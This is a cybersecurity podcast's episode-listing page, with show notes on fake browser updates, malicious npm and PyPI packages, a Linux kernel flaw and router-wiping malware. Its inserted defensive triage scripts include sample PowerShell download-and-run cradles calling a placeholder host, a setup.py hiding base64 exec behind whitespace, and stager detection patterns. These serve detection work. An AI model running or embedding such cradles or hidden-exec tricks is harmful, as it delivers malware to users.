The Daily Decrypt The Digital Security Collective
“The Daily Decrypt”, hosted by offsetkeyz and d0gesp4n, offers an insightful and approachable take on cybersecurity. Their discussions cover a range of topics, from specific software vulnerabilities to broader issues like mobile security and ransomware trends. They delve into technical details while maintaining accessibility for a general audience, emphasizing practical advice and current developments in the cybersecurity field. The podcast strikes a balance between in-depth analysis and user-friendly content, with a focus on high-quality audio and production.
Fake Browser Updates, Atlassian RCE Exploit, glup-debugger-log
In today's episode, we discuss fake browser updates distributing BitRAT and Lumma Stealer via Discord (https://thehackernews.com/2024/06/beware-fake-browser-updates-deliver.html), a malicious npm package (glup-debugger-log) targeting Gulp users with a RAT (https://thehackernews.com/2024/06/researchers-uncover-rat-dropping-npm.html), and the high-severity Atlassian Confluence RCE vulnerability (CVE-2024-21683) for which a PoC is now available (https://www.helpnetsecurity.com/2024/06/03/cve-2024-21683-poc/). Tune in to learn about these critical cybersecurity threats and how you can protect your systems. Thanks to Jered Jones for providing the music for this episode. https://www.jeredjones.com/ Logo Design by https://www.zackgraber.com/
Tags:
Browser Updates, Cybersecurity Threat, BitRAT, Lumma Stealer, eSentire, Fake Browser Updates, Discord, Malicious npm Package, Gulp Toolkit, Remote Access Trojans, Software Supply Chain Attacks, CVE-2024-21683, Atlassian Confluence, Remote Code Execution, Cyber Attackers, Cybersecurity Researchers, Downloader Malware, Exploit, Developer Security, Cyber Attack Mitigation
Search Phrases:
How to avoid fake browser updates
BitRAT malware detection
What is Lumma Stealer
Discord used for malware distribution
Malicious npm packages 2024
Latest remote access trojans
CVE-2024-21683 Atlassian Confluence vulnerability
Protect against software supply chain attacks
eSentire cybersecurity report
Remote code execution in Atlassian Confluence
https://thehackernews.com/2024/06/beware-fake-browser-updates-deliver.html
Rise of Fake Browser Updates as Malware Vectors:
Cybercriminals now use fake browser updates to distribute BitRAT and Lumma Stealer malware.
These attacks typically start when users visit compromised websites that redirect them to fraudulent update pages.
Actionable Insight: Avoid downloading updates from unfamiliar sources; always verify the legitimacy of update prompts through official channels.
Discord as a Malware Distribution Platform:
Attackers use Discord to host malicious files, leveraging its widespread use among legitimate users.
Bitdefender found over 50,000 harmful links on Discord in the past six months.
Actionable Insight: Exercise caution when downloading files from Discord and report suspicious links to platform moderators.
Sophisticated Attack Chain Mechanisms:
Attacks involve JavaScript and PowerShell scripts within ZIP files to execute malware.
These scripts load additional payloads disguised as PNG image files, adding a layer of obfuscation.
Actionable Insight: Use advanced endpoint protection that can detect and mitigate script-based attacks.
BitRAT and Lumma Stealer Capabilities:
BitRAT can harvest data, mine cryptocurrency, and take control of infected devices.
Lumma Stealer, available for rent, steals information from web browsers and crypto wallets.
Actionable Insight: Regularly update and patch software, employ strong passwords, and use multi-factor authentication to protect sensitive information.
Emerging Threats: Drive-by Downloads and Malvertising:
Fake browser update attacks often utilize drive-by downloads and malvertising techniques.
Recent campaigns trick users into manually executing malicious PowerShell code under the guise of browser updates.
Actionable Insight: Educate users on the risks of drive-by downloads and ensure robust network defenses are in place.
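The two mechanics above (payloads hidden behind a .png name inside the ZIP, and a PowerShell one-liner the victim is told to paste as an "update") are both cheap to check for once the drop is quarantined. The script below is an added example written for this summary, not code from The Hacker News article or the eSentire report; the file names, the sample drop and the 203.0.113.5 address are constructed, and the indicator regexes are this example's own choice of what a stager usually looks like.

```python
"""Triage helpers for the fake-browser-update drop described above.

Added example (not from The Hacker News article or the eSentire report).
Two checks a responder can run over the files from a quarantined ZIP:
  1. content/extension mismatch: a ".png" whose bytes are not a PNG, since
     the chain hides follow-on payloads behind an image extension;
  2. PowerShell text matching download-cradle, hidden-window and
     encoded-command patterns used by "paste this update command" lures.
The sample drop at the bottom is constructed for this example.
"""
import re

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PE_MAGIC = b"MZ"
ZIP_MAGIC = b"PK\x03\x04"

# (regex, label) pairs, matched case-insensitively. Each one alone is weak;
# several together are the shape of a typical one-liner stager.
POWERSHELL_INDICATORS = [
    (r"-(?:enc|encodedcommand|e)\b", "encoded command"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"\biex\b|invoke-expression", "invoke-expression"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", "download cradle"),
    (r"-nop\b|-noprofile", "no profile"),
    (r"executionpolicy\s+bypass|-ep\s+bypass", "execution policy bypass"),
]


def sniff_type(data: bytes) -> str:
    """Coarse type from leading bytes (magic), ignoring the file name."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(PE_MAGIC):
        return "pe"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    try:
        data[:512].decode("utf-8")
    except UnicodeDecodeError:
        return "binary"
    return "text"


def extension_mismatch(name: str, data: bytes) -> bool:
    """True when the name claims .png but the bytes do not start with PNG magic."""
    ext = name.lower().rsplit(".", 1)[-1] if "." in name else ""
    return ext == "png" and not data.startswith(PNG_MAGIC)


def powershell_indicators(text: str) -> list:
    """Labels of every stager pattern present in a script or command line."""
    return [label for pat, label in POWERSHELL_INDICATORS if re.search(pat, text, re.I)]


def triage_drop(files: dict) -> dict:
    """Map file name -> list of findings, for the files that look malicious."""
    findings = {}
    for name, data in files.items():
        notes = []
        kind = sniff_type(data)
        if extension_mismatch(name, data):
            notes.append(f"claims .png but content is {kind}")
        if kind == "text":
            hits = powershell_indicators(data.decode("utf-8", "replace"))
            if hits:
                notes.append("powershell indicators: " + ", ".join(hits))
        if notes:
            findings[name] = notes
    return findings


# Constructed sample of what such a drop looks like (203.0.113.5 is a
# documentation address, not a real C2).
SAMPLE_DROP = {
    "update.js": b"var sh = new ActiveXObject('WScript.Shell');"
                 b" sh.Run('powershell -w hidden -nop -enc SQBFAFgA', 0);",
    "stage2.png": PE_MAGIC + b"\x90\x00\x03\x00" + b"\x00" * 60,
    "logo.png": PNG_MAGIC + b"\x00\x00\x00\rIHDR",
    "update.ps1": b"$u='http://203.0.113.5/stage2.png';"
                  b" IEX (New-Object Net.WebClient).DownloadString($u)",
}

if __name__ == "__main__":
    for name, notes in triage_drop(SAMPLE_DROP).items():
        print(name, "->", "; ".join(notes))
```

Run it on the extracted contents of a suspect archive by building the dict from the files on disk; a real PNG passes cleanly while the PE-behind-.png and both scripts are flagged. The magic check is the part worth keeping in an endpoint rule: a download that is an executable whatever it calls itself is the signal here, not the name.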
Lumma Stealer's Growing Popularity:
Lumma Stealer logs for sale increased by 110% from Q3 to Q4 2023, indicating its effectiveness and high success rate.
Actionable Insight: Implement continuous monitoring and threat intelligence to detect and respond to emerging threats promptly.
Exploiting Pirated Software:
Attackers use pirated software and adult game installers to distribute various malware, including Orcus RAT and XMRig miner.
Actionable Insight: Avoid using pirated software and educate users -
Linux Vulnerability Exploits, Ticketmaster Breach, Snowflake Compromise
In today's episode, we cover the critical Linux vulnerability CVE-2024-1086 being actively exploited and urge users to patch immediately (https://arstechnica.com/security/2024/05/federal-agency-warns-critical-linux-vulnerability-being-actively-exploited/). We also discuss the Ticketmaster data breach by the ShinyHunters group, impacting 560 million customers and demanding a £400,000 ransom (https://www.theguardian.com/technology/article/2024/jun/01/live-nation-investigating-data-breach-of-its-us-ticketmaster-unit). Lastly, we delve into potential Snowflake compromises involving stolen customer credentials, with conflicting reports on whether Snowflake itself or its customers were breached (https://www.helpnetsecurity.com/2024/05/31/snowflake-compromised-data-theft/).
Tags:
Linux, Exploited, Kernel, Vulnerability, CVE, Cybersecurity, CISA, ShinyHunters, Ticketmaster, Cybercrime, Data breach, Cybercriminals, Snowflake, Credentials, Security, Privilege escalation
Search Phrases:
How to protect against CVE-2024-1086
Linux kernel vulnerability CVE-2024-1086
ShinyHunters Ticketmaster data breach
Snowflake stolen credentials breach
Cybersecurity measures for Linux vulnerabilities
Protecting against data breaches in Ticketmaster
Cybercrime groups targeting big companies
Escalating privileges in Linux kernel
Preventing credential-based attacks in Snowflake
Recent exploits in cybersecurity 2024
Linux vulnerability being actively exploited
https://arstechnica.com/security/2024/05/federal-agency-warns-critical-linux-vulnerability-being-actively-exploited/
Critical Linux Vulnerability Alert:
The US Cybersecurity and Infrastructure Security Agency (CISA) added a critical Linux vulnerability (CVE-2024-1086) to its known exploited vulnerabilities list. [Source: Dan Goodin, Ars Technica]
Severity and Impact:
Severity rating: 7.8 out of 10.
Affected Linux kernel versions: 5.14 through 6.6.
The vulnerability allows privilege escalation, enabling attackers to gain higher system privileges.
Technical Details:
It's a use-after-free error in the nf_tables (netfilter) component of the Linux kernel.
Use-after-free errors can result in remote code execution or privilege escalation; in this case a local, unprivileged user can gain root.
The bug was patched in January, but many systems remain unpatched.
Exploitation Details:
Exploits allow for a "powerful double-free primitive" when the correct code paths are hit.
Techniques include arbitrary code execution in the kernel and potentially dropping a universal root shell.
Action Required:
CISA mandates federal agencies to patch by June 20.
All affected organizations should update their systems immediately.
Engagement Tips:
Question for Listeners: Have you checked if your systems are running the affected Linux kernel versions?
Call to Action: Update your systems now to prevent potential exploitation.
Feedback Request: Share your experiences with patching critical vulnerabilities on our social media channels.
Keeping these points in mind will help you keep your systems patched and current on the latest cybersecurity threats. Stay safe out there!
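The listener question above ("have you checked if your systems are running the affected Linux kernel versions?") is answerable with a short script. The one below is an added example, not from the Ars Technica article or CISA; it encodes the 5.14 through 6.6 window the briefing gives and adds two hardening checks that are assumptions of this example rather than something the page states: whether modprobe is configured to keep nf_tables from loading, and whether unprivileged user namespaces are enabled (the public exploit needs a user namespace to talk to nf_tables as an ordinary user). The sample /proc/modules text is constructed.

```python
"""Exposure check for CVE-2024-1086 (nf_tables use-after-free) on a Linux host.

Added example, not from the Ars Technica article or CISA. It encodes the
version window the briefing states (5.14 through 6.6) plus two hardening
knobs commonly recommended against this bug: keeping nf_tables from loading
and disabling unprivileged user namespaces. Treat the result as a triage
hint only: distributions backport fixes without changing the version string,
so confirm against your distro's advisory before calling a host safe. All
inputs are passed in as text so the functions run offline; main() reads the
live host.
"""
import os
import re

AFFECTED_MIN = (5, 14)
AFFECTED_MAX = (6, 6)


def parse_kernel_version(release: str) -> tuple:
    """'6.5.0-28-generic' -> (6, 5, 0). Accepts `uname -r` style strings."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unparseable kernel release: {release!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def in_affected_window(release: str) -> bool:
    """Major.minor inside the 5.14 .. 6.6 window named in the briefing."""
    major, minor, _ = parse_kernel_version(release)
    return AFFECTED_MIN <= (major, minor) <= AFFECTED_MAX


def nf_tables_loaded(proc_modules: str) -> bool:
    """Text of /proc/modules: the first column is the module name."""
    return any(line.split(" ", 1)[0] == "nf_tables"
               for line in proc_modules.splitlines() if line.strip())


def nf_tables_blocked(modprobe_conf: str) -> bool:
    """True if modprobe.d text prevents nf_tables from being loaded."""
    pat = r"^\s*(?:blacklist\s+nf_tables|install\s+nf_tables\s+/bin/(?:false|true))\s*$"
    return re.search(pat, modprobe_conf, re.M) is not None


def unprivileged_userns_enabled(sysctls: dict) -> bool:
    """Debian/Ubuntu expose kernel.unprivileged_userns_clone; on any kernel
    user.max_user_namespaces=0 also stops new namespaces. Unknown values are
    treated as enabled, which is the conservative reading."""
    if sysctls.get("kernel.unprivileged_userns_clone") == "0":
        return False
    if sysctls.get("user.max_user_namespaces") == "0":
        return False
    return True


def assess(release: str, proc_modules: str, sysctls: dict, modprobe_conf: str) -> dict:
    r = {
        "kernel": release,
        "in_affected_window": in_affected_window(release),
        "nf_tables_loaded": nf_tables_loaded(proc_modules),
        "nf_tables_blocked": nf_tables_blocked(modprobe_conf),
        "unprivileged_userns": unprivileged_userns_enabled(sysctls),
    }
    # "Loaded" is informational: a module that is not loaded now can still be
    # auto-loaded on first use, so only the modprobe block counts as mitigation.
    r["likely_exposed"] = (r["in_affected_window"]
                           and not r["nf_tables_blocked"]
                           and r["unprivileged_userns"])
    return r


def read_sysctl(name: str) -> str:
    try:
        with open("/proc/sys/" + name.replace(".", "/")) as f:
            return f.read().strip()
    except OSError:
        return ""


def main() -> None:
    """Run against the live host (Linux only)."""
    modprobe = ""
    if os.path.isdir("/etc/modprobe.d"):
        for fn in os.listdir("/etc/modprobe.d"):
            try:
                with open(os.path.join("/etc/modprobe.d", fn)) as f:
                    modprobe += f.read() + "\n"
            except OSError:
                pass
    try:
        with open("/proc/modules") as f:
            modules = f.read()
    except OSError:
        modules = ""
    names = ("kernel.unprivileged_userns_clone", "user.max_user_namespaces")
    sysctls = {n: read_sysctl(n) for n in names}
    for k, v in assess(os.uname().release, modules, sysctls, modprobe).items():
        print(f"{k}: {v}")


if __name__ == "__main__":
    main()
```

The version window is deliberately coarse (major.minor only) because the point release that carries the backported fix differs per distribution; a host reported as likely exposed should be patched, and a host reported as not exposed should still be checked against the vendor's advisory for the exact build.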
Ticketmaster hit by data hack that may affect 560m customers
https://www.theguardian.com/technology/article/2024/jun/01/live-nation-investigating-data-breach-of-its-us-ticketmaster-unit
Ticketmaster Cyber-Attack: Ticketmaster has experienced a significant data breach, with hackers offering to sell customer data on the dark web. Live Nation, Ticketmaster's parent company, confirmed the breach and is working with forensic investigators and law enforcement to mitigate the risks. [Source: The Guardian]
Snow -
Mystery Malware Destroys 600,000 Routers, and CISOs Under Board Pressure, FlyingYeti Exploits WinRAR Vulnerability
In today's episode, we explore the FlyingYeti campaign, which exploits a WinRAR vulnerability (CVE-2023-38831) to deliver COOKBOX malware in Ukraine, as detailed by Cloudflare's Cloudforce One: https://thehackernews.com/2024/05/flyingyeti-exploits-winrar.html. Next, we discuss the unprecedented mystery malware attack that destroyed 600,000 routers at the ISP Windstream, reported by Black Lotus Labs: https://arstechnica.com/security/2024/05/mystery-malware-destroys-600000-routers-from-a-single-isp-during-72-hour-span/. Finally, we dive into the Trend Micro study on CISOs facing pressure from corporate boards to downplay cyber risk: https://www.cybersecuritydive.com/news/cisos-pressure-boards-downplay-cyber-risk/717497/.
Tags: WinRAR, COOKBOX, FlyingYeti, Cloudflare, cyber warfare, Ukraine, phishing attacks, malware, routers, ISP, threat actor, Trend Micro, CISOs, cyber risks, organizational security
Search Phrases:
WinRAR vulnerability explained
COOKBOX malware detection and removal
FlyingYeti cyber attack details
Cloudflare security advisories
Protecting against phishing attacks
Malware impact on routers
ISP security breach cases
Trend Micro cybersecurity reports
CISO corporate board pressure
Organizational cybersecurity best practices
May 31
An unknown threat actor recently unleashed a devastating malware attack that obliterated over 600,000 routers from a single internet service provider in just 72 hours, forcing the company to replace all of the affected devices and leaving their patrons in digital darkness. What the heck happened here, and how will we recover from this?
Under mounting pressure from corporate boards, nearly four in five chief information security officers, or CISOs, are being pushed to downplay the severity of cyber risks, as revealed by a recent Trend Micro study. How can CISOs navigate the pressure from corporate boards while also maintaining a robust security posture?
And finally, sometimes I pick stories simply because the name is too good. So FlyingYeti is exploiting a WinRAR vulnerability to deliver COOKBOX malware in Ukraine, marking another alarming chapter in Russia-aligned cyber warfare.
You're listening to The Daily Decrypt.
In just over a 72-hour time period, malware called Chalubo rendered more than 600,000 routers permanently unusable. All of these routers belonged to a single internet service provider named Windstream, and this ISP is now forced to replace every single one of these routers. Now, that is not a small task. A lot of these routers live in rural areas, which would be a long drive for ISP technicians to make, and there are only so many ISP technicians out there. Sure, they can ship you these routers, but that's going to take a long time, because no supply chain is equipped to handle a random 600,000-product order overnight. So who knows how long these people will be without internet?
The specific routers that were affected are ActionTec T3200 and Sagemcom, and users are reporting a static red light on their routers, which indicates failure. Wow.
Black Lotus Labs utilized the Censys search engine to track these affected router models and noted that throughout that 72-hour time period there was a 49% drop in connections for these routers. So almost half of these routers on the public internet went offline.
I had mentioned that a lot of these routers lived in rural areas, but the spread of this disaster is pretty wide and vast, because this internet service provider provided service specifically to rural areas. And what is out in rural areas? A lot of farming and agriculture. So who knows what sort of impact this will have over our food source in the coming months, 'cause even tractors nowadays rely on wifi, which is a whole 'nother wormhole that I won't get to on this episode, but if you're interested, go ahead and look up John De -
Open Source Tool Defeats Ransomware, StackOverflow users push malicious Python packages, Are you in the 911 S5 botnet?
In today's episode, we explore how cybercriminals exploited StackOverflow to promote the malicious Python package "pytoileur" aimed at cryptocurrency theft (https://thehackernews.com/2024/05/cybercriminals-abuse-stackoverflow-to.html). We also examine the FBI's takedown of the 911 S5 botnet and its massive impact on online fraud and cybercrime (https://krebsonsecurity.com/2024/05/is-your-computer-part-of-the-largest-botnet-ever/). Lastly, we introduce RansomLord, an open-source anti-ransomware tool that leverages DLL hijacking to block ransomware attacks pre-encryption (https://github.com/malvuln/RansomLord).
FBI Botnet: https://www.fbi.gov/investigate/cyber/how-to-identify-and-remove-vpn-applications-that-contain-911-s5-backdoors
00:00 Introduction to Ransomware Defense
01:12 Ransom Lord: A Game Changer
03:55 How to Check for Botnet Infections
06:47 Malicious Python Package Alert
09:19 Conclusion and Final Thoughts
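The pytoileur story in this episode and the glup-debugger-log npm package from the June 3 episode share one mechanic: code that runs at install time, before the package is ever imported. For npm that is a lifecycle script in package.json; for a Python source distribution it is setup.py, which pip executes. The script below is an added example written for these two stories, not code from Sonatype, The Hacker News or either podcast source; the two sample manifests are constructed, the regex list is this example's own choice of "things a build script has little reason to do", and the whitespace-gap heuristic targets the trick of padding a line with spaces so the payload sits far to the right of the editor window.

```python
"""Pre-install inspection of a package for install-time hooks.

Added example; not code from the researchers behind either report. Both
stories share one mechanic: code that runs on `npm install` or `pip install`
before the package is imported. For npm that is a lifecycle script in
package.json; for a Python sdist it is setup.py, which is executed. The two
samples at the bottom are constructed for this example, not the real packages.
"""
import json
import re

NPM_LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# (regex, label): constructs a build script has little reason to use.
PY_SUSPECT = [
    (r"\bexec\s*\(|\beval\s*\(", "dynamic code execution"),
    (r"\bb64decode\b|base64\.", "base64 decoding"),
    (r"\burllib\b|\brequests\.|http\.client|\bsocket\.", "network access at install time"),
    (r"\bsubprocess\b|os\.system|os\.popen", "shell command execution"),
    (r"\bcmdclass\s*=", "custom install command class"),
]
# A run of this many blanks between two non-blank characters pushes the rest
# of the line off screen in most editors.
HIDDEN_GAP = re.compile(r"\S[ \t]{40,}\S")


def scan_package_json(text: str) -> list:
    """Findings for npm lifecycle scripts that run at install time."""
    scripts = json.loads(text).get("scripts", {})
    return [f"lifecycle script '{hook}': {cmd}"
            for hook, cmd in scripts.items() if hook in NPM_LIFECYCLE]


def scan_setup_py(text: str) -> list:
    """Findings for suspicious constructs in a setup.py, with line numbers."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if HIDDEN_GAP.search(line):
            findings.append(f"line {lineno}: code hidden behind a long run of whitespace")
        for pat, label in PY_SUSPECT:
            if re.search(pat, line):
                findings.append(f"line {lineno}: {label}")
    return findings


# Constructed samples (not the real glup-debugger-log or pytoileur files).
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-logger",
    "version": "1.0.0",
    "scripts": {"postinstall": "node play.js", "test": "echo ok"},
})

SAMPLE_SETUP_PY = (
    "from setuptools import setup\n"
    "setup(name='example', version='0.1')" + " " * 200
    + "exec(__import__('base64').b64decode('cHJpbnQoJ2hpJyk='))\n"
)

if __name__ == "__main__":
    for finding in scan_package_json(SAMPLE_PACKAGE_JSON) + scan_setup_py(SAMPLE_SETUP_PY):
        print(finding)
```

To get the files without running them, fetch the artifact first: `npm pack <name>` gives you the tarball to unpack and read, and `pip download --no-deps --no-binary :all: <name>` fetches the sdist. When you install anyway, `npm install --ignore-scripts` and `pip install --only-binary :all:` keep install-time code from executing, which closes the exact door both packages walked through.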
Tags:
Cybercriminals, Python Package Index, pytoileur, cryptocurrency theft, malicious packages, StackOverflow, open source security, botnet, VPN, YunHe Wang, 911 S5, cybersecurity, RansomLord, exploits, vulnerabilities, ransomware protection
Search Phrases:
Cybercriminal infiltration of Python Package Index
pytoileur malicious package on StackOverflow
Cryptocurrency theft using pytoileur
How to protect against malicious Python packages
Largest botnet disguised as VPN service
Arrest of YunHe Wang for cybercrime
911 S5 botnet detection methods
Protecting computers from 911 S5 botnet
RansomLord tool against ransomware
Ransomware vulnerabilities exploited by RansomLord
May 30
There is a new proof-of-concept open source tool called RansomLord that attacks the malware that launches ransomware, in order to defeat it before it can encrypt your files. I'm a little blown away by this one, but we'll get to that in a sec. How can RansomLord change the game for ransomware defenders, and what tactics does it use to defeat ransomware?
The largest botnet ever, operating under the guise of free VPN services, has been dismantled with the arrest of its alleged mastermind for orchestrating cyber crimes totalling billions of dollars in fraudulent losses. How can you check if your computer is part of the 911 S5 botnet, and what steps can you take to protect yourself in the future?
The Python Package Index has been infiltrated with a malicious package named pytoileur, which has now been found to facilitate cryptocurrency theft by leveraging reputable platforms such as StackOverflow. What measures can developers take to protect themselves from being deceived by malicious packages like this one?
You're listening to The Daily Decrypt.
Alright. So as defenders, we are constantly thinking about how to defeat ransomware, but I haven't seen much come out other than detection capabilities. So we're still focused on detecting indicators of compromise that might lead to ransomware. But just yesterday Help Net Security released an article on an open source anti-ransomware tool that essentially attacks the ransomware malware using DLL hijacking and automates the creation of PE files, which are used to exploit ransomware before it can encrypt your files. So even the thought of this type of defense makes me so excited. The idea that there can be more than just detecting indicators of compromise for ransomware prevention, when we can actually go in and attack the ransomware itself and get rid of it before it even has the opportunity to encrypt your files. It's a breath of fresh air.
So this tool, which is free and open source and available on GitHub (the link is in the show notes below), deploys exploits in order to defend the network, which is a novel strategy for defeating ransomware. It also uses vulnerability intelligence that maps threats to vulnerable DLLs in order to target specific thr -
Harry Coker Jr. Bolsters Security for Critical Infrastructures in Auburn Keynote
In today's episode, we discuss the White House's call for critical cybersecurity assistance for sectors like healthcare and water utilities (https://www.cybersecuritydive.com/news/white-house-seeks-critical-cyber-assistance-for-water-utilities-healthcare/716942/), analyze the compromise of JAVS Viewer software by loader malware (https://www.helpnetsecurity.com/2024/05/23/javs-viewer-malware/), and explore how rising cyberattacks are driving the growth of the cybersecurity industry, affecting companies like AWS, Cisco, and CrowdStrike (https://www.cybersecuritydive.com/news/attacks-fuel-cyber-business/716782/).
Full Coker Speech: https://www.youtube.com/watch?v=1yR3kfajhk0
00:00 Introduction to the Cybersecurity Boom
01:04 The Economics of Cybersecurity
03:22 National Cyber Director's Keynote Highlights
04:14 The Cost of Cybersecurity Measures
05:19 Teenagers in Cybercrime: A Growing Concern
06:13 JAVS Viewer Malware: What You Need to Know
07:50 Conclusion and Call to Action
Tags: Harry Coker Jr, healthcare, water utilities, ransomware, National Cyber Director, critical infrastructure, cyber threats, innovative strategies, cybersecurity, administration initiatives, Lapsus, teenage cybercrime, JAVS, recording software, loader malware, security risks, courtrooms, prisons, compromised software, cybersecurity vendors, digital threat landscape, market complexity
Search Phrases:
Initiatives by Harry Coker Jr in cybersecurity
Healthcare cyber threat protection strategies
Water utilities ransomware defense
National Cyber Director's speech on cyber threats
Administration measures against teenage cybercrime
Compromised JAVS software security risks
Immediate actions for JAVS Viewer users
Cybersecurity vendors' role in digital threat evolution
Increasing complexity in the cybersecurity market
Global spending on cybersecurity in 2023
May 24
Cyber attacks are propelling the cybersecurity industry to new heights, with global spending on security projected to hit an astonishing $215 billion this year. How are cybersecurity vendors adapting to the constant evolution of cyber threats while also contributing to increased complexity in the market?
National Cyber Director Harry Coker Jr. announced a sweeping initiative to fortify healthcare and water utilities against cyber threats, highlighting a commitment to strengthen America's critical infrastructure, at a keynote speech on Wednesday. What measures is the administration taking to deter teenagers from joining cyber criminal groups like Lapsus$?
Threat researchers have discovered that legitimate recording software from JAVS has been compromised with loader malware directly from the developer's own site. If you're using the JAVS Viewer, what actions can you take if you suspect your version has been compromised?
You're listening to The Daily Decrypt.
The cybersecurity industry is thriving, thanks to the rise in cyber attacks. Now, this makes sense. Supply and demand is the foundation of capitalism, and cyber attacks are on the rise, so of course cybersecurity is booming. But this reminds me sort of eerily of the show Fallout, which is on Amazon Prime. Highly recommend; one of my favorite TV shows of all time. But go ahead and skip the next 15 seconds if you don't want any spoilers. One of the most fascinating aspects of that show is how Vault-Tec, the maker of these vaults, was one of the top companies in the country, because they preyed on citizens' fear of a nuclear war. So they made these vaults to keep people safe in the impending nuclear bomb drop. But in order to stay on top, in order to stay relevant, they needed that nuke to drop. And I don't think we're at that point yet with cybersecurity. I believe the volume of cyber attacks is enough to sustain a $200 billion industry. But who knows what will happen in 10, 20, 30 years, maybe in ord -
Windows Recall Feature Takes Secret Screenshots, Microsoft President to Testify Before Congress, Disconnect Public Facing ICS Devices
In today's episode, we discuss Microsoft President Brad Smith's upcoming testimony before Congress regarding security shortcomings (source: https://www.cybersecuritydive.com/news/microsoft-president-congressional-hearing/716847/), dive into the privacy concerns surrounding Windows 11's new Recall feature (source: https://www.helpnetsecurity.com/2024/05/22/windows-recall-security-privacy/), and detail Rockwell Automation's advisory on disconnecting internet-facing ICS devices amid rising cyber threats (source: https://thehackernews.com/2024/05/rockwell-advises-disconnecting-internet.html).
00:00 Introducing Windows 11's Recall Feature: A Privacy Concern?
01:11 The Risks and Protections Against Windows 11's Recall Feature
04:44 Microsoft's Response to Security Breaches and Future Plans
06:41 Advisory on Industrial Control Systems Amid Cyber Threats
07:36 Wrapping Up and How to Stay Connected
Tags List
Microsoft, Brad Smith, Cybersecurity, Congress, Windows, Recall, AI, cybercriminals, Rockwell Automation, Industrial control systems, Cyber threats, Vulnerabilities
Search Phrases
Microsoft cybersecurity measures
Brad Smith congressional testimony
Impact of recent cyberattacks on Microsoft
Security risks of Windows Recall feature
Protecting against cyber intrusions
Rockwell Automation cybersecurity advice
Industrial control systems cyber threats
Geopolitical tensions and cyber vulnerabilities
Scanning for public-facing assets in cybersecurity
Mitigating cyber risks in industrial control systems
May 23
Microsoft Windows has introduced a new feature in Windows 11 powered machines called Recall, which takes screenshots of your open applications every couple of seconds and uses AI to analyze them. This is obviously stirring fears among security experts, who are warning that it could become a goldmine for cybercriminals if misused. How can users protect themselves from these potential security and privacy risks posed by Windows Recall?
Speaking of Microsoft: on June 13th, Microsoft President Brad Smith will face Congress to address a cascade of security failures that led to their recent cyber intrusions.
And finally, Rockwell Automation is advising urgent disconnects of internet-facing industrial control systems, amid rising cyber threats linked to geopolitical tensions and exploited vulnerabilities in these ICS devices. What immediate actions can administrators take to not only check if their devices are publicly accessible, but also remediate it?
You're listening to The Daily Decrypt.
Hey, no press is bad press. And today, Microsoft Windows is getting a lot of press. So just recently, Microsoft has introduced a new feature called Recall in Windows 11 that captures screenshots every few seconds and then uses AI to search through these screenshots and interact with specific content, essentially indexing everything that you do on your computer. This could be very useful for those of us like myself who have a terrible memory and want to remember what we were just doing. Users can go in and search through their history on their computer to see, "Hey, what was I doing 10 minutes ago that I need to continue doing?" Sure, sounds great. You know who else can search through your whole history? Anyone who's compromised your system. So this feature can be disabled, which is great. You can also specify apps that you want to exclude from this, so if that app is open, it will stop taking screenshots. But what's key to understand is that if you're compromised, an attacker can covertly enable this feature using PowerShell. And so once they have that enabled, they can just sit back and wait for you to do something that jeopardizes your privacy, like entering your social security number, see what banks you use, maybe use those screenshots to extort you, maybe you're doing something you woul